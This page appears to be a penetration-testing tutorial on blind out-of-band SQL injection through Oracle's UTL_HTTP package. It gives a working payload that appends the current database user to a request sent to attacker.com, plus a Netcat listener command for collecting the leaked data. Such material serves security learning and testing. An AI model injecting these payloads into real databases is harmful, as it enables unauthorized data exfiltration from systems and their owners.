UTL_HTTP

Context

In this article, we explore how to exploit Oracle's UTL_HTTP package for blind out-of-band SQL injection attacks. Familiarity with HTTP requests, database functions, and Oracle SQL injection is assumed. The goal is to exfiltrate data from an Oracle database by leveraging the UTL_HTTP package, which allows database interactions with external web services. This type of injection is particularly useful when direct database responses to injected queries are not accessible.

Theory

UTL_HTTP Functionality in Oracle

UTL_HTTP is a PL/SQL package within Oracle databases that enables the execution of HTTP requests. This package is intended to facilitate communication between the database and external web services, allowing the database to send HTTP requests to specified URLs. While designed for legitimate purposes, UTL_HTTP can be exploited for malicious data exfiltration in the context of SQL injection attacks.

The vulnerability arises from the ability to craft SQL injection payloads that issue HTTP requests from the database. These requests can contain sensitive data, redirecting it to an attacker-controlled server for unauthorized access.

Blind Out-of-Band SQL Injection

Blind out-of-band SQL injection is a technique used when direct feedback from injected queries is not possible. By leveraging side channels, attackers can extract data indirectly. The process involves crafting payloads that initiate actions outside the database, such as HTTP requests to an external server controlled by the attacker.

An essential requirement for this attack is that the vulnerable Oracle database has access to external servers and can execute HTTP requests via UTL_HTTP. By injecting payloads that include sensitive database information in HTTP query parameters or paths, an attacker can extract data without receiving direct database responses.

Practice

Exploiting UTL_HTTP for Blind Out-of-Band SQL Injection

These steps guide you through exploiting UTL_HTTP to achieve data exfiltration when a direct response from the database is unavailable:

  • Identify a Vulnerable SQL Query: Begin by locating an Oracle SQL query that includes access to the UTL_HTTP package. This query should be injectable and capable of issuing HTTP requests through UTL_HTTP.

  • Inject the Payload: Use the following command to craft and inject a SQL payload that retrieves sensitive data.

    SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual;

    This payload sends an HTTP request to http://attacker.com/, appending the result of (SELECT user FROM dual) to the URL. The query retrieves the current database user, leaking this information to the attacker's server.

  • Monitor Attack Server Logs: Set up an HTTP server on the attacker's side and monitor the access logs for incoming requests. This can be achieved using tools like Netcat or a simple web server setup.

    nc -lnvp 80

    As the injected SQL executes, the Oracle database sends HTTP requests to http://attacker.com/, which appear in the server logs.

  • Extract Data from Logs: Analyze the HTTP server logs to collect the leaked data. Each request may contain parts of the database information exfiltrated from the Oracle system.

Result

Executing the above steps allows an attacker to exfiltrate sensitive data from an Oracle database by leveraging the UTL_HTTP package in a blind out-of-band SQL injection attack. The data flows through HTTP requests to an attacker's server without requiring direct query results.

Tools

  • Burp Suite
  • Netcat

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.